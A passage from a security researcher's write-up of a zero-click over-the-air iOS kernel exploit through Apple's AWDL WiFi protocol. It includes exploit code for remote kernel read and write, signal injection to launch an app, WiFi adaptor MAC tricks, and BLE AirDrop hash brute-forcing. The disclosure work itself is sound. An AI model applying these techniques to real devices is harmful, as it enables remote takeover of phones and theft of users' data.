We now have a truly arbitrary read, but unfortunately it can be a bit slow. Sometimes it takes a few seconds for the MI template to be updated. What we need is a way to force the MI template to be regenerated on demand.


Looking through the cross references to IO80211AWDLPeerManager::updateBroadcastMI I noticed that it seems the MI template gets regenerated each time the peer bloom filter gets updated in IO80211AWDLPeerManager::updatePeerListBloomFilter. As we saw much earlier in this post, and I had determined months before this point, the bloom filter code isn't used. But... we have an arbitrary add so we could just turn it on!


Indeed, by flipping the flag at +0x5950 in the IO80211AWDLPeerManager we can enable the peer bloom filter code.


With peer bloom filters enabled, each time the target sees a new peer it regenerates the MI template in order to ensure it's broadcasting an up-to-date bloom filter containing all the peers it knows about (or at least the first 256 in the peer list). This means we can make our arbitrary read much, much faster: we just need to send the correct NSync TLV containing our read target then spoof a new peer and wait for an updated MI. With this technique complete we can read arbitrary remote kernel memory over the air at a rate of many kilobytes per second.
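
Putting it together, one iteration of the fast read looks roughly like this sketch, reusing the exploit's inject() and try_get_TLV() helpers; NSYNC_READ_TARGET() and spoof_new_peer() are hypothetical wrappers for the steps described above:

void* fast_read(uint64_t kaddr) {
  // update the fake request descriptor via lower_peer's NSync TLV buffer:
  inject(RT(), WIFI(dst, lower_peer), AWDL(), SYNC_PARAMS(),
         NSYNC_READ_TARGET(kaddr), PKT_END());
  spoof_new_peer();         // forces the MI template to be regenerated
  return try_get_TLV(0x10); // the 0x10 TLV now contains the disclosed memory
}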

Remote kernel memory read/write API

At this point we can build the typical abstraction layer used by a local privilege escalation exploit, except this time it's remote.


The main kernel memory read function is:


void* rkbuf(uint64_t kaddr, uint32_t len);


With some helpers to make the code simpler:


uint64_t rk64(uint64_t kaddr);

uint32_t rk32(uint64_t kaddr);

uint8_t rk8(uint64_t kaddr);


Similarly for writing kernel memory, we have the main write method:


void wk8(uint64_t kaddr, uint8_t desired_byte);


and some helpers:


void wkbuf(uint64_t kaddr, uint8_t* desired_value, uint32_t len);

void wk64(uint64_t kaddr, uint64_t desired_value);

void wk32(uint64_t kaddr, uint32_t desired_value);
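
These are presumably just thin wrappers; for example, a sketch:

uint64_t rk64(uint64_t kaddr) {
  uint64_t v;
  memcpy(&v, rkbuf(kaddr, sizeof(v)), sizeof(v));
  return v;
}

void wkbuf(uint64_t kaddr, uint8_t* desired_value, uint32_t len) {
  for (uint32_t i = 0; i < len; i++) {
    wk8(kaddr + i, desired_value[i]); // one byte-write per iteration
  }
}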


From this point the exploit code starts to look a lot more like a regular local privilege escalation exploit and the remote aspect is almost completely abstracted away.

Popping calc with 15 bytes

This is already enough to pop calc. To do this we just need a way to inject a control flow edge into userspace somehow. A bit of grepping through the XNU code and I stumbled across the code handling BSD signal delivery which seemed promising.


Each process structure has an array of signal handlers; one per signal number.


struct sigacts {

  user_addr_t ps_sigact[NSIG];   /* disposition of signals */

  user_addr_t ps_trampact[NSIG]; /* disposition of signals */

  ...


The ps_trampact array contains userspace function pointers. When the kernel wants a userspace process to handle a signal it looks up the signal number in that array:


  trampact = ps->ps_trampact[sig];


then sets the userspace thread's pc value to that:


  sendsig_set_thread_state64(

    &ts.ts64.ss,

    catcher,

    infostyle,

    sig,

    (user64_addr_t)&((struct user_sigframe64*)sp)->sinfo,

    (user64_addr_t)p_uctx,

    token,

    trampact,

    sp,

    th_act)


Where sendsig_set_thread_state64 looks like this:


static kern_return_t

sendsig_set_thread_state64(arm_thread_state64_t *regs,

                           user64_addr_t catcher,

                           int infostyle,

                           int sig,

                           user64_addr_t p_sinfo,

                           user64_addr_t p_uctx,

                           user64_addr_t token,

                           user64_addr_t trampact,

                           user64_addr_t sp,

                           thread_t th_act) {

  regs->x[0] = catcher;

  regs->x[1] = infostyle;

  regs->x[2] = sig;

  regs->x[3] = p_sinfo;

  regs->x[4] = p_uctx;

  regs->x[5] = token;

  regs->pc = trampact;

  regs->cpsr = PSR64_USER64_DEFAULT;

  regs->sp = sp;

 

  return thread_setstatus(th_act,

                          ARM_THREAD_STATE64,

                          (void *)regs,

                          ARM_THREAD_STATE64_COUNT);

}


The catcher value in X0 is also completely controlled, read from the ps_sigact array.


Note that the kernel APIs for setting userspace register values don't require userspace pointer authentication codes.


We can set X0 to the constant CFString "com.apple.calculator" already present in the dyld_shared_cache. On 13.3 on the 11 Pro this is at 0x1BF452778 in an unslid shared cache.


We set PC to this gadget in CommunicationSetupUI.framework:


MOV  W1, #0

BL   _SBSLaunchApplicationWithIdentifier


This clears W1 then calls SBSLaunchApplicationWithIdentifier, a Springboard Services Framework private API for launching apps.
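
In effect, the fake signal makes a thread in the victim process execute something like this (a sketch; the exact prototype of the private API is an assumption):

// X0 = CFSTR("com.apple.calculator"), W1 = 0:
SBSLaunchApplicationWithIdentifier(CFSTR("com.apple.calculator"), 0);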


The final piece of this puzzle is finding a process to inject the fake signal into. It needs to have the com.apple.springboard.launchapplications entitlement in order for Springboard to process the launch request. Using Jonathan Levin's entitlement database it's easy to find the list of injection candidates.


We remotely traverse the linked list of running processes looking for a victim, set a fake signal handler then make a thread in that process believe it has to handle a signal by OR'ing in the correct signal number in the uthread's siglist bitmap of pending signals:


wk8(uthread+0x10c+3, 0x40); // uthread->siglist


and finally making the thread believe it needs to handle a BSD AST:


wk8_no_retry(thread+0x2e8, 0x80); // thread->act |= AST_BSD


Now, when this thread gets scheduled and tries to handle pending ASTs, it will try to handle our fake signal and a calculator will appear:


An iPhone 11 Pro running Calculator.app with a monitor in the background displaying the output from the final stage of the AWDL exploit

Improving the bootstrap BSS steering read

We've popped calc, we're done! Or are we? It's kinda slow, and there's no real reason for it to be so slow. We managed to build quite a fast arbitrary read primitive so that's not the bottleneck. The major bottleneck at the moment is the initial BSS Steering-based read. It's taking 8 seconds per read because it needs the state machine to time out between each attempt.


As we saw, however, the BSS Steering TLV indicates that we should be able to steer up to 8 peers at the same time, meaning that we should be able to improve our read speed by at least 8x. In fact, if we can get away with 8 or fewer initial reads our read speed could be much faster than that.


However, when you try to steer 8 peers simultaneously, it doesn't quite work as expected:


When multiple peers are steered the UMIs flood the airwaves. In this example I was steering 8 peers but the frames are dominated by UMIs to the first peer. You can see a handful of UMIs to :06, and one to :02 amongst the dozens to :00.


Testing against MacOS we also see the following log message:


Peer 22:22:aa:22:00:00 DID NOT ack our UMI


When the target tries to steer 8 peers at the same time it starts flooding the airwaves with UMI frames directed at the target peers - so many in fact that it never actually manages to send the UMIs for all 8 steering targets before timing out.


We've already covered how to stall the initial sending of UMIs by controlling the channel sequence, but it looks like we're also going to have to ACK the UMI frames.

ACK a MAC?

As we saw earlier, ACKs in 802.11a and g are timing based. To ACK a frame you have to send the ACK in the short window following the transmission of the frame. We definitely can't do that using libpcap; the timing needs microsecond precision. We probably can't even do that with a custom kernel driver.


There is however an obscure WiFi adaptor monitor mode feature called "Active Monitor Mode", supported by very few chipsets.


Active monitor mode allows you to inject and monitor arbitrary frames as usual, except in active monitor mode (as opposed to regular monitor mode) the adaptor will still ACK frames if they're being sent to its MAC address.


The Mediatek MT76 chipset was the only one I could find with a USB adaptor that supports this feature. I bought a bunch of MT76-based adaptors and the only one where I could actually get this feature to work was the ZyXEL NWD6605 which uses an mt76x2u chipset.


The only issue was that Active Monitor Mode would only actually work when running at 12 Mbps on a 5GHz channel, but my current setup was using adaptors which were not capable of 5GHz injection.

Moving to 5GHz

I had tried right back at the beginning of the exploit development process to get 5GHz injection and monitoring to work; after trying for a week with lots of adaptors, building many, many branches of kernel drivers and fiddling with radiotap headers, I had given up and decided to focus on getting something working on 2.4GHz with my old adaptors.


This time around I just bought all the adaptors I could find which looked like they might have even the remotest possibility of working and tried again.


One of the challenges is that OEMs won't consistently use the same chipset or revision of chipset in a device, which means getting hold of a particular chipset and revision can be a hit-and-miss process.


Here are all the adaptors which I used during this exploit to try to find support for the features I wanted:


All the WiFi adaptors tested during this exploit development process, from top left to bottom right: D-Link DWA-125, Netgear WG111-v2, Netgear A6210, ZyXEL NWD6605, ASUS USB-AC56, D-Link DWA-171, Vivanco 36665, tp-link Archer T1U, Microsoft Xbox wireless adaptor Model 1790, Edimax EW-7722UTn V2, FRITZ!WLAN AC430M, ASUS USB-AC68, tp-link AC1300


In the end I required two different adaptors to get the features I wanted:


Active monitor mode and frame injection: ZyXEL NWD6605 using mt76x2u driver


Monitor mode (including management and ACK frames): Netgear A6210 using rtl8812au driver


With this setup I was able to get frame injection, monitor mode sniffing of all frames including management and ACK frames as well as Active monitor mode to work at 12 Mbps on channel 44.

Working with Active Monitor Mode

You can enable the feature like this:


ip link set dev wlan1 down

iw dev wlan1 set type monitor

iw dev wlan1 set monitor active control otherbss

ip link set dev wlan1 up

iw dev wlan1 set channel 44


We can change the card's MAC address using the ip tool like this:


ip link set dev wlan1 down

ip link set wlan1 address 44:44:22:22:22:22

ip link set dev wlan1 up


Changing the MAC address like this takes at least a second and the interface has to be down. Since we're trying to make these reads as fast as possible, I decided to take a look at how this MAC address change actually worked to see if I could speed it up...


Three ways to set a MAC: 1 - ioctl

The old way to set a network device MAC address is to use the SIOCSIFHWADDR ioctl:


#include <stdint.h>
#include <string.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <net/if.h>
#include <net/if_arp.h>

struct ifreq ifr = {0};

uint8_t mac[6] = {0x22, 0x23, 0x24, 0x00, 0x00, 0x00};

memcpy(&ifr.ifr_hwaddr.sa_data[0], mac, 6);

int s = socket(AF_INET, SOCK_DGRAM, 0);

strcpy(ifr.ifr_name, "wlan1");

ifr.ifr_hwaddr.sa_family = ARPHRD_ETHER;

int ret = ioctl(s, SIOCSIFHWADDR, &ifr);

printf("ioctl retval: %d\n", ret);


This interface is deprecated and doesn't work at all for this driver.


Three ways to set a MAC: 2 - netlink

The current supported interface is netlink. It took a whole day to learn enough about netlink to write a standalone PoC to change a MAC address. Netlink is presumably very powerful but also quite obtuse. And even after all that (perhaps unsurprisingly) it's no faster than the command line tool which is really just making these same netlink API calls too.


Check out change_mac_nl.c in the released exploit source code to see the netlink code.
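
The core of that PoC follows the standard rtnetlink pattern; a minimal sketch (set_mac_netlink and ifindex are illustrative names, see change_mac_nl.c for the real thing):

#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>

int set_mac_netlink(int ifindex, const uint8_t mac[6]) {
  struct {
    struct nlmsghdr nh;
    struct ifinfomsg ifi;
    char attrbuf[64];
  } req = {0};

  req.nh.nlmsg_len = NLMSG_LENGTH(sizeof(struct ifinfomsg));
  req.nh.nlmsg_type = RTM_NEWLINK;
  req.nh.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
  req.ifi.ifi_family = AF_UNSPEC;
  req.ifi.ifi_index = ifindex;

  // append an IFLA_ADDRESS attribute carrying the new MAC:
  struct rtattr* rta =
    (struct rtattr*)((char*)&req + NLMSG_ALIGN(req.nh.nlmsg_len));
  rta->rta_type = IFLA_ADDRESS;
  rta->rta_len = RTA_LENGTH(6);
  memcpy(RTA_DATA(rta), mac, 6);
  req.nh.nlmsg_len = NLMSG_ALIGN(req.nh.nlmsg_len) + RTA_ALIGN(rta->rta_len);

  int fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
  struct sockaddr_nl sa = { .nl_family = AF_NETLINK };
  ssize_t ret = sendto(fd, &req, req.nh.nlmsg_len, 0,
                       (struct sockaddr*)&sa, sizeof(sa));
  close(fd);
  return ret < 0 ? -1 : 0; // and the interface still has to be down first
}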


Three ways to set a MAC: 3 - hacker

Trying to do this the supported way has failed; it's just way too slow. But thinking about it, what is the MAC anyway? It's almost certainly just some field stored in flash or RAM on the chipset. And indeed, diving into the mt76x2u Linux kernel driver source and tracing the functions which set the MAC address, we can see that it ends up writing to some configuration registers on the chip:


#define MT_MAC_ADDR_DW0 0x1008

#define MT_MAC_ADDR_DW1 0x100c

 

void mt76x02_mac_setaddr(struct mt76x02_dev *dev, const u8 *addr)

{

  static const u8 null_addr[ETH_ALEN] = {};

  int i;

 

  ether_addr_copy(dev->mt76.macaddr, addr);

 

  if (!is_valid_ether_addr(dev->mt76.macaddr)) {

    eth_random_addr(dev->mt76.macaddr);

    dev_info(dev->mt76.dev,

             "Invalid MAC address, using random address %pM\n",

             dev->mt76.macaddr);

  }

 

  mt76_wr(dev,

          MT_MAC_ADDR_DW0,

          get_unaligned_le32(dev->mt76.macaddr));

 

  mt76_wr(dev,

          MT_MAC_ADDR_DW1,

          get_unaligned_le16(dev->mt76.macaddr + 4) |

            FIELD_PREP(MT_MAC_ADDR_DW1_U2ME_MASK, 0xff));

   ...


I wonder if I could just write directly to those configuration registers? Would it completely blow up? Or would it just work? Is there an easy way to do this or will I have to patch the driver?


Looking around the driver a bit we can see it has a debugfs interface. Debugfs is a very neat way for drivers to easily expose lots of internal stuff out to userspace, restricted to root, for logging and monitoring as well as for messing around with:


/sys/kernel/debug/ieee80211/phy7/mt76# ls

agc  ampdu_stat  dfs_stats  edcca  eeprom  led_pin  queues  rate_txpower  regidx  regval  temperature  tpc  tx_hang_reset  txpower


What we're after is a way to write to arbitrary control registers, and these two debugfs files let you do exactly that:


# cat regidx

0

# cat regval

0x76120044


If you write the address of the configuration register you want to read or write to the regidx file as a decimal value, then reading or writing the regval file lets you read or write that configuration register as a 32-bit hexadecimal value. Note that exposing configuration registers this way is a feature of this particular driver's debugfs interface, not a generic feature of debugfs. With this we can completely skip the netlink interface and the requirement to bring the device down, and instead directly manipulate the internal state of the adaptor.


I replace the netlink code with this:


void mt76_debugfs_change_mac(char* phy_str, struct ether_addr new_mac) {

    union mac_dwords {

      struct ether_addr new_mac;

      uint32_t dwords[2];

    } data = {0};

 

    data.new_mac = new_mac;

 

    char lower_dword_hex_str[16] = {0};

    snprintf(lower_dword_hex_str, 16, "0x%08x\n", data.dwords[0]);

 

    char upper_dword_hex_str[16] = {0};

    snprintf(upper_dword_hex_str, 16, "0x%08x\n", data.dwords[1]);

 

    char* regidx_path = NULL;

    asprintf(&regidx_path,

             "/sys/kernel/debug/ieee80211/%s/mt76/regidx",

             phy_str);

 

    char* regval_path = NULL;

    asprintf(&regval_path,

             "/sys/kernel/debug/ieee80211/%s/mt76/regval",

             phy_str);

 

    file_write_string(regidx_path, "4104\n");

    file_write_string(regval_path, lower_dword_hex_str);

 

    file_write_string(regidx_path, "4108\n");

    file_write_string(regval_path, upper_dword_hex_str);

 

    free(regidx_path);

    free(regval_path);   

}
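
file_write_string is just a trivial helper along these lines (a sketch):

#include <stdio.h>

static void file_write_string(const char* path, const char* str) {
  FILE* f = fopen(path, "w");
  if (f) {
    fputs(str, f); // the driver's debugfs write handler does the register access
    fclose(f);
  }
}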


and... it works! The adaptor instantly starts ACKing frames to whichever MAC address we write in to the MAC address field in the adaptor's configuration registers.


All that's then required is a rewrite of the early read code:


Now it starts out steering 8 stalled peers. Each time a read is requested, if there's still time left before steering times out and there are still stalled peers, one stalled peer is chosen, has its steering_msg_blob pointer corrupted with the read target and gets unstalled. The target will start sending UMIs to that peer; we set the correct MAC address on the active monitor device, sniff the UMI and ACK it to stop the peer sending more. From the UMI we extract the value from TLV 0x1d and get the disclosed kernel memory.


If there are no more stalled peers, or steering has timed out, we wait a safe amount of time until we're able to restart all 8 peers and start again:


struct ether_addr reader_peers[8];

 

struct early_read_params {

    struct ether_addr dst;

    char* phy_str;

} er_para;

 

void init_early_read(struct ether_addr dst, char* phy_str) {

  er_para.dst = dst;

  er_para.phy_str = phy_str;

 

  reader_peers[0] = *(ether_aton("22:22:aa:22:00:00"));

  reader_peers[1] = *(ether_aton("22:22:aa:22:00:01"));

  reader_peers[2] = *(ether_aton("22:22:aa:22:00:02"));

  reader_peers[3] = *(ether_aton("22:22:aa:22:00:03"));

  reader_peers[4] = *(ether_aton("22:22:aa:22:00:04"));

  reader_peers[5] = *(ether_aton("22:22:aa:22:00:05"));

  reader_peers[6] = *(ether_aton("22:22:aa:22:00:06"));

  reader_peers[7] = *(ether_aton("22:22:aa:22:00:07"));

}

 

// state required between early reads:

uint64_t steering_begin_timestamp = 0;

int n_steered_peers = 0;

 

void* try_early_read(uint64_t kaddr, size_t* out_size) {

  struct ether_addr peer_b = *(ether_aton("22:22:bb:22:00:00"));

  int n_peers = 8;

  struct ether_addr reader_peer;

  int should_restart_steering = 0;

 

  // what phase are we in?

 

  uint64_t milliseconds_since_last_steering =

    (now_nanoseconds() - steering_begin_timestamp) /

    (1ULL*1000ULL*1000ULL);

  

  if (milliseconds_since_last_steering < 5000 &&

      n_steered_peers < 8) {

    // if less than 5 seconds have elapsed since we started steering

    // and we haven't reached the peer limit, then steer the next peer

 

    reader_peer = reader_peers[n_steered_peers++];

 

  } else if (milliseconds_since_last_steering < 8000) {

    // wait for the steering machine to timeout so we can restart it

    usleep((8000 - milliseconds_since_last_steering) * 1000);

    should_restart_steering = 1;

  } else {

    // more than 8 seconds have already elapsed since we last 

    // started steering (or we've never started it) so restart

    should_restart_steering = 1;

  }

 

  if (should_restart_steering) {

    // make reader peers suitable for bss steering

    n_steered_peers = 0;

 

    for (int i = 0; i < n_peers; i++) {

      inject(RT(),

          WIFI(er_para.dst, reader_peers[i]),

          AWDL(),

          SYNC_PARAMS(),

          CHAN_SEQ_EMPTY(),

          HT_CAPS(),

          UNICAST_DATAPATH(0x1307 | 0x800),

          PKT_END());

    }

 

    inject(RT(),

           WIFI(er_para.dst, peer_b),

           AWDL(),

           SYNC_PARAMS(),

           HT_CAPS(),

           UNICAST_DATAPATH(0x1307),

           BSS_STEERING_0(reader_peers, n_peers),

           PKT_END());

 

    steering_begin_timestamp = now_nanoseconds();

    reader_peer = reader_peers[n_steered_peers++];

  }

 

  char overflower[128] = {0};

  *(uint64_t*)(&overflower[0x50]) = kaddr;

 

  // set the card's MAC to ACK the UMI from the target

  mt76_debugfs_change_mac(er_para.phy_str, reader_peer);

 

  inject(RT(),

      WIFI(er_para.dst, reader_peer),

      AWDL(),

      SYNC_PARAMS(),

      SERV_PARAM(),

      HT_CAPS(),

      DATAPATH(reader_peer),

      SYNC_TREE((struct ether_addr*)overflower,

                sizeof(overflower)/sizeof(struct ether_addr)),

      PKT_END());

 

  // try to receive a UMI:

  void* steering_tlv = try_get_TLV(0x1d);

 

  if (steering_tlv) {

    struct mini_tlv {

      uint8_t type;

      uint16_t len;

    } __attribute__((packed));

    *out_size = ((struct mini_tlv*)steering_tlv)->len+3;

  } else {

    printf("didn't get TLV\n");

  }

 

  // NULL out the bsssteering blob

  char null_overflower [128] = {0};

  inject(RT(),

      WIFI(er_para.dst, reader_peer),

      AWDL(),

      SYNC_PARAMS(),

      SERV_PARAM(),

      HT_CAPS(),

      DATAPATH(reader_peer),

      SYNC_TREE((struct ether_addr*)null_overflower,

                sizeof(null_overflower)/sizeof(struct ether_addr)),

      PKT_END());

 

  // the active monitor interface doesn't always manage to ACK

  // the first frame, give it a chance

  usleep(1*1000);

 

  return steering_tlv;

}

Demo

With some luck we can bootstrap the faster read primitive with 8 or fewer early reads, which means that on an iPhone 11 Pro with AWDL enabled, popping calc now looks like this:


In this demo AWDL has been manually enabled by opening the sharing panel in the Photos app. This keeps the AWDL interface active. The exploit gains arbitrary kernel memory read and write within a few seconds and is able to inject a signal into a userspace process to cause it to JOP to a single gadget which opens Calculator.app

Zero clicks

I mentioned that AWDL has to be enabled; it isn't always on. In order to make this an interactionless, zero-click exploit which can target any device in radio proximity, we therefore need a way to force devices to enable their AWDL interface.


AWDL is used for many things. For example, my iPhone seems to turn on AWDL when it receives a voicemail, because it really wants to AirPlay the voicemail to my Apple TV. But sending someone a voicemail requires their phone number, and we're looking for an attack which requires no identifiers and no non-default settings.


The second research paper from the SEEMOO labs team demonstrated an attack to enable AWDL using Bluetooth low energy advertisements to force arbitrary devices in radio proximity to enable their AWDL interfaces for Airdrop. SEEMOO didn't publish their code for this attack so I decided to recreate it myself.

Enabling AWDL

In the iOS Photos app, when you select the sharing dialog and tap "AirDrop", a list of nearby iOS and MacOS devices appears, any of which you can send your photo to. Most people don't want random passers-by sending them unsolicited photos, so the default AirDrop sharing setting is "Contacts Only", meaning you will only see AirDrop sharing requests from users in your contacts book. But how does this work? For an in-depth discussion, check out the SEEMOO labs paper.


When a device wants to share a file via AirDrop it starts broadcasting Bluetooth low-energy advertisements which look like this example, broadcast by MacOS:


[PACKET] [ CH:37|CLK:1591031840.920892|RSSI:-44dBm ] << BLE - Advertisement Packet | type=ADV_IND | addr=28:C4:72:91:05:D7 | data=02010617ff4c000512000000000000000001297f247ee56f62b300 >>


BLE advertisements are small; they have a maximum payload size of 31 bytes. The bundle of bytes at the end are actually four truncated 2-byte SHA256 hashes of the contact information of the device which is trying to share something. The contact information used is the email addresses and phone numbers associated with the device's logged-in iCloud account. You can generate the same truncated hashes like this:


In this case I'm using a test account with the iCloud email address: '[email protected]'


>>> import hashlib

>>> s = '[email protected]'

>>> hashlib.sha256(s.encode('utf-8')).hexdigest()[:4] 

'62b3'


Notice that this matches the penultimate two bytes in the advertisement frame shown above. The contact hashes are unsalted, which can have some fun consequences if you live in a country with localized mobile phone numbers, but this is an understandable performance optimization.


All iOS devices are constantly receiving and processing BLE advertisement frames like this. In the case of these AirDrop advertisements, when the device is in the default "Contacts Only" mode, sharingd (which parses BLE advertisements) checks whether this unsalted, truncated hash matches the truncated hashes of any emails or phone numbers in the device's address book.


If a match is found this doesn't actually mean the sending device really is in the receiver's address book, just that there is a contact with a colliding hash. In order to resolve this the devices need to share more information and at this point the receiver enables AWDL to establish a higher-bandwidth communication channel.


The SEEMOO labs paper continues in great detail about how the two devices then really verify that the sender is in the receiver's address book, but we are only trying to get AWDL enabled so we're done. As long as we keep broadcasting the advertisement with the colliding hash the target's AWDL interface will remain active.

Blue in the teeth

The SEEMOO labs team paper discusses the custom firmware they wrote for a BBC micro:bit so I picked up a couple of those:


The BBC micro:bit is an education-focused dev board. This photo shows the rear of the board; the front has a 5x5 LED matrix and two buttons. They cost under $20.


These devices are intended for the education/maker market. It's a Nordic nRF51822 SOC with a Freescale KL26 acting as a USB programmer for the nRF51. BBC provide a small programming environment for it, but you can build any firmware image for the nRF51, plug in the micro:bit which appears as a mass-storage device thanks to the KL26 and drag and drop the firmware image on there. The programmer chip flashes the nRF51 for you and you can run your code. This is the device which the SEEMOO labs team used and wrote a custom firmware for.


Whilst playing around with the micro:bit I discovered MIRAGE, a generic and amazingly well-documented project for doing all manner of radio security research. Their tools include a firmware for the micro:bit, and indeed, dropping their provided firmware image on to the micro:bit and running this:


sudo ./mirage_launcher ble_sniff SNIFFING_MODE=advertisements INTERFACE=microbit0


we're able to start sniffing BLE advertisements:


[PACKET] [ CH:37|CLK:1591006615.511192|RSSI:-46dBm ] << BLE - Advertisement Packet | type=ADV_IND | addr=58:6A:80:4F:41:74 | data=02011a020a0707ff4c000f020000 >>


Indeed, if you do this at home you'll likely see a barrage of BLE traffic from everything imaginable. Apple devices are particularly chatty; notice the frames sent each time your AirPods case is opened and closed.


If we take a look at a couple of captured BTLE frames when we try to share a file via AirDrop, we can see there's clearly structure in there:


MacOS:

data=02010617ff4c000512000000000000000001fa5c2516bf07aba400

iOS 13:

data=02011a020a070eff4c000f05a035c928291002710c

 

             LEN    APPL T L  V

020106       17  ff 4c00 0512 000000000000000001 fa5c 2516 bf07 aba4 00

02011a020a07 0e  ff 4c00 0f05 a035c92829 1002 710c

                                

Definitely looks like more TLVs! With some reversing in sharingd we can figure out what these types are:


"Invalid" 0x0

"Hash" 0x1

"Company" 0x2

"AirPrint" 0x3

"ATVSetup" 0x4

"AirDrop" 0x5

"HomeKit" 0x6

"Prox" 0x7

"HeySiri" 0x8

"AirPlayTarget" 0x9

"AirPlaySource" 0xa

"MagicSwitch" 0xb

"Continuity" 0xc

"TetheringTarget" 0xd

"TetheringSource" 0xe

"NearbyAction" 0xf

"NearbyInfo" 0x10

"WatchSetup" 0x11


MacOS is sending AirDrop messages in the BLE advertisements. iOS is sending NearbyAction and NearbyInfo messages.

Brute forcing SHA256, or two bytes of it at least

For testing purposes we want some contacts on the device. As in the SEEMOO labs paper, I generated 100 random contacts using a modified version of the AppleScript in this StackOverflow answer. Each contact has 4 contact identifiers: home and work email, home and work phone numbers.


We can also use MIRAGE to prototype brute-forcing through the 16-bit space of truncated contact hashes. I wrote a MIRAGE module to broadcast AirDrop advertisements with incrementing truncated hashes. The MIRAGE micro:bit firmware doesn't support arbitrary broadcast frame injection, but it is able to use the Raspberry Pi 4's built-in Bluetooth controller. Running it for a while and looking at the console output from the iPhone, we notice some helpful log messages showing up in Console.app:


Hashing: Error: failed to get contactsContainsShortHashes because (ratelimited)


The SEEMOO paper mentioned that they were able to brute force a truncated hash in a couple of seconds but it appears Apple have now added some rate limiting.


Spoofing different BT source MAC addresses didn't help, but slowing the brute force to one attempt every 2 seconds or so seemed to please the rate limiting: with average luck, in around 30 seconds AWDL gets enabled and MI and PSF frames start to appear on the AWDL social channels.


As long as we keep broadcasting the same advertisement with the matching contact hash the AWDL interface will remain active. I didn't want to keep MIRAGE as a dependency so I ported the python prototype to use the linux native libbluetooth library and hci_send_cmd to build custom advertisement frames:


uint8_t payload[] = {0x02, 0x01, 0x06,

                     0x17,

                     0xff,

                     0x4c, 0x00, 

                     0x05, 

                     0x12, 

                     0x00, 0x00, 0x00, 0x00,

                     0x00, 0x00, 0x00, 0x00, 0x01, 

 

                     hash1[0], hash1[1],

                     hash2[0], hash2[1],

                     hash3[0], hash3[1],

                     hash4[0], hash4[1],

 

                     0x00};

 

le_set_advertising_data_cp data = {0};

data.length = sizeof(payload);

memcpy(data.data, payload, sizeof(payload));

hci_send_cmd(handle,

             OGF_LE_CTL,

             OCF_LE_SET_ADVERTISING_DATA,

             sizeof(payload)+1,

             &data);

Popping calc with zero clicks

Combining the AWDL exploit and BLE brute-force, we get a new demo:


With the phone left idle on the home screen and no user interaction we force the AWDL interface to activate using BLE advertisements. The AWDL exploit gains kernel memory read write in a few seconds after starting and the entire end to end exploit takes around a minute.


There may well be better, faster ways to force-enable AWDL but for my demo this will do.

Let's run an implant!

This demo is neat but really doesn't convey that we've compromised almost all the user's data, with no interaction. We can read and write kernel memory remotely. I know that Apple has invested significant effort in "post-exploitation" hardening, so I wanted to demonstrate that, with just this single vulnerability, those mitigations could be defeated to the point where I could run something like the real-world implants we've seen deployed against end users before. Trying to defend against an attacker with arbitrary memory read/write is a losing game, but there's a difference between saying that and proving it.

Speedy writer

We're going to need to write much more arbitrary data for this final step, so we need the arbitrary write to be even faster. There's one more optimization left.


Due to the order in which loads and stores occur in actionFrameReport we were able to build a primitive which gave us a timestamp valid for up to 1024ms and a large n_frames_in_last_second value. We used that to do one arbitrary add, then restarted the whole setup: replaced upper_peer's timestamp with 0, sent another frame to get a fresh timestamp and so on.


But why can't we just keep using the first timestamp and bundle more writes together? We can, it's just very important to take care that we don't exceed that 1024ms window. The exploit takes a very conservative approach here and uses only a few extra milliseconds. The reason is that we're running as a regular userspace program on a small system. We don't have anything like real-time scheduling guarantees. Linux kind-of supports running userspace programs on isolated cores to give something like a real-time experience, but for getting this demo exploit running it was sufficient to boost the priority of the exploit process with nice and leave a large safety window in the 1024ms. The code tries to bundle large buffer writes in chunks of 16 which provides a reasonable speed up.
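
A sketch of the bundling, with refresh_timestamp() and wk8_in_window() as hypothetical helpers which re-arm the primitive and perform a single in-window byte write:

void wkbuf_bundled(uint64_t kaddr, uint8_t* buf, uint32_t len) {
  for (uint32_t i = 0; i < len; i += 16) {
    refresh_timestamp(); // open a fresh 1024ms window
    uint32_t n = (len - i) < 16 ? (len - i) : 16;
    for (uint32_t j = 0; j < n; j++) {
      wk8_in_window(kaddr + i + j, buf[i + j]); // stay well inside the window
    }
  }
}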

Physmapping

Way back when I released the first demo exploit which disclosed random chunks of physical memory I had taken a look at how the physmap works on iOS.


Linux, Windows and XNU all have physmaps; they are a very convenient way of manipulating physical memory when your code has paging enabled and can't directly manipulate physical memory any more.


Abstractly, physmaps are virtual mappings of all of physical memory


The physmap is (typically) a 1:1 virtual mapping of physical memory. You can see in the diagram how the physical memory at the bottom might be split up into different regions, with some of those regions currently mapped in the kernel virtual address space. Some other physical memory regions might for example be used for userspace processes.


The physmap is the large kernel virtual memory region shown towards the right of the virtual address space, which is the same size as the amount of physical memory. The pagetables which translate virtual memory accesses in this region are set up in such a way that any access at an offset into the physmap virtual region gets translated to that same offset from the base of physical memory.
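
In that flat model, translating a physical address to its physmap alias is just an offset; as a sketch (physmap_base and phys_base are illustrative names):

uint64_t phys_to_kva(uint64_t pa) {
  return physmap_base + (pa - phys_base);
}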


The physmap in XNU isn't set up exactly like that. Instead it uses a "segmented physical aperture". In practice this means that XNU sets up a number of smaller "sub-physmaps" inside the physmap region and populates a table called the PTOV table to allow translation from a physical address to a virtual address inside the physmap region:


pa: 0x000000080e978000 kva: 0xfffffff070928000 len: 0xde03c000 (3.7GB)

pa: 0x0000000808e14000 kva: 0xfffffff06ade4000 len: 0x05b44000 (95MB)

pa: 0x0000000801b80000 kva: 0xfffffff066000000 len: 0x04cb8000 (80MB)

pa: 0x0000000808d04000 kva: 0xfffffff06acf4000 len: 0x000f0000 (1MB)

pa: 0x0000000808df4000 kva: 0xfffffff06acd4000 len: 0x00020000 (130kb)

pa: 0x0000000808cec000 kva: 0xfffffff06acbc000 len: 0x00018000 (100kb)

pa: 0x0000000808a80000 kva: 0xfffffff06acb8000 len: 0x00004000 (16kb)

pa: 0x0000000808df4000 kva: 0xfffffff06acf4000 len: 0x00000000 (0kb)


There's one more important physical region not captured in the PTOV table which is the kernelcache image itself; this is found starting at gVirtBase and the kernel functions for translating between physical and physmap-virtual addresses take this into account.
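
A physical-to-virtual lookup over a PTOV-style table like the one dumped above then amounts to something like this sketch (types and names are illustrative, not XNU's):

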